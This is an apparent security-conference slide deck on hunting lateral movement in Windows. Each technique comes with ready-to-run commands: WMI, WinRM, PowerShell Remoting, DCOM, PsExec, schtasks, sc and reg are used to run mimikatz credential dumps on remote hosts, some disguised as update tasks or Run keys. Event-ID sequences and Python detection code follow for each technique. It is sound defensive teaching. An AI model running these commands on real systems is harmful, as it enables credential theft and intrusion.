Hunting Lateral Movement in Windows Infrastructure
![Page 1: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/1.jpg)
Hunting Lateral Movement in Windows Infrastructure
Teymur Kheirkhabarov
![Page 2: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/2.jpg)
Who Am I
• Senior SOC Analyst @Kaspersky Lab
• SibSAU (Krasnoyarsk) graduate
• Ex- Infosec dept. head
• Ex- Infosec admin
• Ex- System admin
• Twitter @HeirhabarovT
• www.linkedin.com/in/teymur-kheirkhabarov-73490867/
![Page 3: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/3.jpg)
What we’re going to talk about
• Different ways to launch executables remotely by using compromised credentials and operating system functionality;
• How to detect remotely launched executables with Windows Event and Sysmon logs.
![Page 4: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/4.jpg)
Remote file copy over SMB
• Copy to autostart locations for execution on login or boot
• Copy to different locations for further execution via WMI, WinRM, Powershell Remoting, Task Scheduler, Service…
How
• Programmatically
• Using Explorer
• Using standard console tools:
  • robocopy C:\tools \\pc0002\ADMIN$\users\public mimikatz.exe
  • powershell Copy-Item -Path mimikatz.exe -Destination \\pc0002\C$\users\public
  • cmd /c "copy mimikatz.exe \\pc0002\C$\users\public"
  • xcopy mimikatz.exe \\pc0002\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
Requirements & limitations
• TCP/445 port is accessible on remote host
• Administrative shares are enabled on remote host
![Page 5: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/5.jpg)
Remote File Copy over SMB – events sequence on destination side
E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. Administrative share access (Windows EID 5140/5145)
E4. File object access with WriteData or AddFile rights (Windows EID 4663) – if audit and SACL were configured
![Page 6: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/6.jpg)
Remote File Copy over SMB – the most interesting events
![Page 7: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/7.jpg)
Hunting: search for administrative shares connections
![Page 8: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/8.jpg)
Windows File Auditing
https://www.malwarearchaeology.com/s/Windows-File-Auditing-Cheat-Sheet-ver-Oct-2016.pdf
![Page 9: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/9.jpg)
Hunting: search for file creation/changes in autostart locations
![Page 10: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/10.jpg)
Remote execution via WMI
How
• Programmatically
• Using standard tools:
  • wmic /node:pc0002 process call create "cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"
  • powershell Invoke-WmiMethod -ComputerName pc0002 -Class Win32_Process -Name Create -ArgumentList '"cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"'
  • powershell -command "&{$process = [WMICLASS]'\\pc0002\ROOT\CIMV2:win32_process'; $process.Create('calc.exe'); }"
  • powershell -command "&{$process = get-wmiobject -query 'SELECT * FROM Meta_Class WHERE __Class = \"Win32_Process\"' -namespace 'root\cimv2' -computername pc0002; $process.Create( 'notepad.exe' );}"
Requirements & limitations
• TCP/135 port is accessible on remote host
• RPC dynamic port range is accessible on remote host
![Page 11: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/11.jpg)
Remote execution via WMI – events sequence on destination side
E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. WmiPrvSE.exe starts payload file (Sysmon EID 1)
![Page 12: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/12.jpg)
Remote execution via WMI – the most interesting events
![Page 13: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/13.jpg)
Remote execution via WinRM
How
• Programmatically
• Using Windows Remote Shell (WinRS) tool:
  • winrs -r:pc0002.test.local C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit
  • winrs -r:pc0002.test.local -u:dadmin C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit
Requirements & limitations
• WinRM is enabled on remote host (disabled by default on client Windows versions)
• TCP/5985 (TCP/5986) port is accessible on remote host
![Page 14: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/14.jpg)
Remote execution via WinRM – events sequence on destination side
E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. svchost.exe starts WinrsHost.exe (Sysmon EID 1)
E4. WinrsHost.exe starts payload file (Sysmon EID 1)
![Page 15: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/15.jpg)
Remote execution via WinRM – the most interesting events
![Page 16: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/16.jpg)
Remote execution via Powershell Remoting
How
• Powershell scripts
• Powershell Invoke-Command cmdlet:
  • powershell Invoke-Command -ComputerName pc0002.test.local -ScriptBlock {cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\pc0002_mimikatz_output.txt }
  • powershell Invoke-Command -ComputerName pc0002.test.local -credential TEST\dadmin -ScriptBlock {cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\pc0002_mimikatz_output.txt }
Requirements & limitations
• WinRM is enabled on remote host (disabled by default on client Windows versions)
• TCP/5985 (TCP/5986) port is accessible on remote host
![Page 17: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/17.jpg)
Remote execution via Powershell Remoting – events sequence on destination side
E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. svchost.exe starts wsmprovhost.exe (Sysmon EID 1)
E4. wsmprovhost.exe starts payload file (Sysmon EID 1)
![Page 18: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/18.jpg)
Remote execution via Powershell Remoting – the most interesting events
![Page 19: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/19.jpg)
Remote execution via MMC20.Application COM
How
• Programmatically
• Using powershell:
powershell -command "&{$com=[activator]::CreateInstance([type]::GetTypeFromProgID('MMC20.Application','pc0002.test.local')); $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,'/c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\pc0002_mimikatz_output.txt','7')}"
Requirements & limitations
• TCP/135 port is accessible on remote host
• RPC dynamic port range is accessible on remote host
https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
![Page 20: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/20.jpg)
Remote execution via MMC20.Application COM – events sequence on destination side
E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. svchost.exe starts mmc.exe (Sysmon EID 1)
E4. mmc.exe starts payload file (Sysmon EID 1)
![Page 21: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/21.jpg)
Remote execution via MMC20.Application COM – the most interesting events
![Page 22: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/22.jpg)
Remote execution via PsExec (& clones, e.g. PaExec)
How
• PsExec:
  • psexec.exe \\pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit
• PaExec:
  • paexec.exe \\pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit
Requirements & limitations
• ADMIN$ administrative share is enabled on remote host
• TCP/445 port is accessible on remote host
![Page 23: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/23.jpg)
Remote execution via PsExec (& clones) – events sequence on destination side
E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. Copying PSEXESVC.exe to ADMIN$ (Windows EID 5140/5145)
E4. psexesvc service is installed and started (Windows EID 7045/7036)
E5. psexesvc.exe is started by services.exe (Sysmon EID 1)
E6. psexesvc.exe starts payload file (Sysmon EID 1)
E7. Interaction with payload stdin/stdout/stderr via SMB pipes (Windows EID 5145)
![Page 24: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/24.jpg)
Remote execution via PsExec (& clones) – the most interesting events
![Page 25: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/25.jpg)
Hunting: search for PsExec (& clones) artifacts – services
![Page 26: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/26.jpg)
Hunting: search for PsExec (& clones) artifacts – access to pipes
![Page 27: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/27.jpg)
Remote execution via PsExec (& clones) – the most interesting events
![Page 28: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/28.jpg)
Hunting: search for executions in network logon sessions (WinRM, WMI, PsExec, Powershell Remoting, MMC20 COM)
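The hunt named on this slide, sketched as an added example that is not taken from the slides: join Sysmon EID 1 process creations to network logons (EID 4624, LogonType 3) on the logon ID, then label each hit by the parent image from the event sequences above. Field names follow the Windows Security and Sysmon event schemas; the sample events, addresses, account names and `renamed_svc.exe` are constructed.

```python
import ntpath

# Parent image -> technique, taken from the event sequences on this page.
PARENT_TECHNIQUE = {
    "wmiprvse.exe": "WMI",
    "winrshost.exe": "WinRM (WinRS)",
    "wsmprovhost.exe": "Powershell Remoting",
    "mmc.exe": "MMC20.Application COM",
    "psexesvc.exe": "PsExec",
}

def lid(value):
    """Normalise a logon ID ('0x5A1F3', '0x5a1f3') to an int."""
    return int(str(value), 16)

def hunt_network_session_executions(events):
    """Return process creations whose LogonId belongs to a network logon."""
    # E1: network logons (4624, LogonType 3), keyed by logon ID.
    sessions = {lid(e["TargetLogonId"]): e for e in events
                if e["Channel"] == "Security" and e["EventID"] == 4624
                and int(e["LogonType"]) == 3}
    # E2: logon IDs that were assigned special privileges (4672).
    privileged = {lid(e["SubjectLogonId"]) for e in events
                  if e["Channel"] == "Security" and e["EventID"] == 4672}
    hits = []
    for e in events:
        if e["Channel"] != "Sysmon" or e["EventID"] != 1:
            continue
        logon = sessions.get(lid(e["LogonId"]))
        if logon is None:
            continue  # not started inside a network logon session
        parent = ntpath.basename(e["ParentImage"]).lower()
        hits.append({
            "source_ip": logon["IpAddress"],
            "user": logon["TargetUserName"],
            "privileged": lid(e["LogonId"]) in privileged,
            # Renamed PsExec clones land in the "unmapped" bucket.
            "technique": PARENT_TECHNIQUE.get(parent, "unmapped parent: " + parent),
            "command_line": e["CommandLine"],
        })
    return hits

# Constructed sample events for illustration only.
SAMPLE = [
    {"Channel": "Security", "EventID": 4624, "LogonType": 3, "TargetLogonId": "0x5A1F3", "TargetUserName": "dadmin", "IpAddress": "192.0.2.15"},
    {"Channel": "Security", "EventID": 4672, "SubjectLogonId": "0x5A1F3"},
    {"Channel": "Sysmon", "EventID": 1, "LogonId": "0x5a1f3", "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "CommandLine": r"cmd /c C:\Users\Public\tool.exe"},
    {"Channel": "Security", "EventID": 4624, "LogonType": 2, "TargetLogonId": "0x2B00C", "TargetUserName": "alice", "IpAddress": "-"},
    {"Channel": "Sysmon", "EventID": 1, "LogonId": "0x2b00c", "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
    {"Channel": "Security", "EventID": 4624, "LogonType": 3, "TargetLogonId": "0x77AA0", "TargetUserName": "svc_backup", "IpAddress": "192.0.2.40"},
    {"Channel": "Sysmon", "EventID": 1, "LogonId": "0x77aa0", "ParentImage": r"C:\Windows\System32\wsmprovhost.exe", "CommandLine": "cmd /c whoami"},
    {"Channel": "Sysmon", "EventID": 1, "LogonId": "0x77aa0", "ParentImage": r"C:\Windows\renamed_svc.exe", "CommandLine": "cmd /c whoami"},
]

if __name__ == "__main__":
    for hit in hunt_network_session_executions(SAMPLE):
        print(hit)
```

The explorer.exe launch in the interactive session is not returned, which is also why this join does not surface the ShellWindows and ShellBrowserWindow COM cases, where the payload runs in the active user's session.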
![Page 29: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/29.jpg)
Remote execution via ShellWindows COM
How
• Programmatically
• Using powershell:
powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39','pc0002')); $obj.item().Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:\Windows\System32',$null,0)}"
Requirements & limitations
• TCP/135 port is accessible on remote host
• RPC dynamic port range is accessible on remote host
https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
![Page 30: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/30.jpg)
Remote execution via ShellBrowserWindow COM
How
• Programmatically
• Using powershell:
powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880','pc0002')); $obj.Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:\Windows\System32',$null,0)}"
Requirements & limitations
• TCP/135 port is accessible on remote host
• RPC dynamic port range is accessible on remote host
• Doesn’t work for Windows 7 destination
https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
![Page 31: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/31.jpg)
Remote execution via ShellWindows or ShellBrowserWindow COM – events sequence on destination side
E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. explorer.exe starts payload file in current session (Sysmon EID 1)
![Page 32: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/32.jpg)
Remote execution via ShellWindows or ShellBrowserWindow COM – how to detect???
Payload file is executed in the session of the current active user
![Page 33: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/33.jpg)
Remote execution via Scheduled Tasks
How
• Programmatically
• Standard command line tools:
  • at \\172.16.205.14 3:55 C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> win_mimikatz_output.txt
  • schtasks /create /S pc0002 /SC ONCE /ST 00:57:00 /TN "Adobe Update" /TR "cmd.exe /c C:\users\public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"
Requirements & limitations
• TCP/135 port and RPC dynamic port range are accessible on remote host (in case of Schtasks usage)
• TCP/445 port is accessible on remote host (in case of AT usage)
![Page 34: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/34.jpg)
Remote execution via Scheduled Tasks – events sequence on destination side
E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. Access to atsvc SMB pipe (Windows EID 5145) – in case of at.exe usage
E4. Scheduled task is created or updated (Windows EID 4698/4702)
E5. Task is triggered. svchost.exe starts taskeng.exe (Sysmon EID 1)
E6. taskeng.exe starts payload file (Sysmon EID 1)
There are also some interesting events in the Microsoft-Windows-TaskScheduler/Operational event log
![Page 35: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/35.jpg)
Remote execution via Scheduled Tasks – the most interesting events
![Page 36: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/36.jpg)
Hunting: search for remotely created or updated scheduler tasks
![Page 37: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/37.jpg)
Remote execution via Scheduled Tasks – the most interesting events
![Page 38: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/38.jpg)
Hunting: search for ATSVC pipe connections
![Page 39: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/39.jpg)
Remote execution via Services
How
• Programmatically
• Standard command line tool:
  • sc \\pc0002 create "Remote service" binPath= "cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"
  • sc \\pc0002 start "Remote service"
  • sc \\pc0002 delete "Remote service"
Requirements & limitations
• TCP/135 port is accessible on remote host
• RPC dynamic port range is accessible on remote host
![Page 40: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/40.jpg)
Remote execution via Services – events sequence on destination side
E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. New service is installed (Windows EID 7045/4697)
E4. Start command is sent to installed service. services.exe starts payload file (Sysmon EID 1)
E5. A timeout is reached (Windows EID 7009)
E6. Failure while trying to start service (Windows EID 7000)
![Page 41: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/41.jpg)
Remote execution via Services – the most interesting events
![Page 42: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/42.jpg)
Hunting: search for remotely created services
![Page 43: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/43.jpg)
Remote registry
How
• Programmatically
• Using powershell or reg:
  • reg add \\pc0002\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v GoogleUpdater /t REG_SZ /d "cmd /c C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Users\Public\result.txt"
  • powershell -command "&{$reg=[Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey(\"LocalMachine\", \"pc0002\"); $key=$reg.OpenSubKey(\"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\",$True); $key.SetValue(\"GoogleUpdater\",\"calc.exe\");}"
Requirements & limitations
• TCP/445 port is accessible on remote host
• Remote Registry service is enabled on remote host
![Page 44: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/44.jpg)
Remote registry – events sequence on destination side
E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. WINREG pipe access (Windows EID 5145)
E4. Registry value is modified (Windows EID 4657) – if audit and SACL were configured
![Page 45: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/45.jpg)
Remote Registry – the most interesting events
![Page 46: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/46.jpg)
Hunting: search for WINREG pipe connections
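The share and pipe hunts on this page (administrative share connections, PsExec pipes, ATSVC and WINREG pipe connections) all read the same EID 5140/5145 fields, so one classifier can cover them. This is an added example, not taken from the slides: field names follow the Windows Security event schema, the sample events are constructed, and matching PsExec-style pipes on a `-stdin`/`-stdout`/`-stderr` suffix is an assumption about pipe naming.

```python
import re

# ShareName as logged in 5140/5145, e.g. \\*\ADMIN$ or \\*\C$ (not \\*\IPC$).
ADMIN_SHARE = re.compile(r"^\\\\\*\\(ADMIN|[A-Z])\$$", re.I)
WRITE_DATA = 0x2  # FILE_WRITE_DATA / FILE_ADD_FILE bit in AccessMask

# RelativeTargetName patterns for pipes opened over IPC$.
PIPE_RULES = [
    (re.compile(r"^atsvc$", re.I), "ATSVC pipe (remote task via at.exe)"),
    (re.compile(r"^winreg$", re.I), "WINREG pipe (remote registry)"),
    # Assumption: PsExec and clones name their I/O pipes with these suffixes.
    (re.compile(r"-(stdin|stdout|stderr)$", re.I), "stdin/stdout/stderr pipe (PsExec or clone)"),
]

def classify(e):
    """Label one 5140/5145 event, or return None if it is not of interest."""
    if e["EventID"] not in (5140, 5145):
        return None
    share = e["ShareName"]
    target = e.get("RelativeTargetName", "")
    if share.upper().endswith("\\IPC$"):
        return next((label for rx, label in PIPE_RULES if rx.search(target)), None)
    if ADMIN_SHARE.match(share):
        if e["EventID"] == 5145 and int(e["AccessMask"], 16) & WRITE_DATA:
            return "file write to administrative share"
        return "administrative share access"
    return None

def hunt_share_access(events):
    """Return (source IP, user, label, target) for every event of interest."""
    return [(e["IpAddress"], e["SubjectUserName"], label, e.get("RelativeTargetName", ""))
            for e in events for label in [classify(e)] if label]

# Constructed sample events for illustration only.
SAMPLE = [
    {"EventID": 5140, "ShareName": r"\\*\ADMIN$", "IpAddress": "192.0.2.15", "SubjectUserName": "dadmin"},
    {"EventID": 5145, "ShareName": r"\\*\ADMIN$", "RelativeTargetName": "PSEXESVC.exe", "AccessMask": "0x2", "IpAddress": "192.0.2.15", "SubjectUserName": "dadmin"},
    {"EventID": 5145, "ShareName": r"\\*\IPC$", "RelativeTargetName": "PSEXESVC-WS01-4412-stdin", "AccessMask": "0x12019f", "IpAddress": "192.0.2.15", "SubjectUserName": "dadmin"},
    {"EventID": 5145, "ShareName": r"\\*\IPC$", "RelativeTargetName": "atsvc", "AccessMask": "0x12019f", "IpAddress": "192.0.2.40", "SubjectUserName": "svc_backup"},
    {"EventID": 5145, "ShareName": r"\\*\IPC$", "RelativeTargetName": "winreg", "AccessMask": "0x12019f", "IpAddress": "192.0.2.40", "SubjectUserName": "svc_backup"},
    {"EventID": 5145, "ShareName": r"\\*\IPC$", "RelativeTargetName": "srvsvc", "AccessMask": "0x12019f", "IpAddress": "192.0.2.77", "SubjectUserName": "alice"},
    {"EventID": 5145, "ShareName": r"\\*\Public", "RelativeTargetName": r"docs\report.docx", "AccessMask": "0x2", "IpAddress": "192.0.2.77", "SubjectUserName": "alice"},
]

if __name__ == "__main__":
    for row in hunt_share_access(SAMPLE):
        print(row)
```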
![Page 47: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/47.jpg)
Windows Registry Auditing
https://www.malwarearchaeology.com/s/Windows-Registry-Auditing-Cheat-Sheet-ver-Oct-2016.pdf
![Page 48: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/48.jpg)
Hunting: search for changes in autostart registry keys
![Page 49: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/49.jpg)
Remote WMI subscriptions creation
![Page 50: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/50.jpg)
Remote WMI subscriptions creation – events sequence on destination side
E1. Network Logon (Windows EID 4624)
E2. Special privileges assigned to new logon (Windows EID 4672)
E3. Writing to WMI Namespace (Windows EID 4662) – if audit and SACL were configured
![Page 51: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/51.jpg)
WMI Namespaces Auditing
![Page 52: Hunting Lateral Movement in Windows Infrastructure](https://reader033.fdocuments.net/reader033/viewer/2022050701/5a6541077f8b9a5b558b5aa1/html5/thumbnails/52.jpg)
Remote WMI subscriptions creation – the most interesting events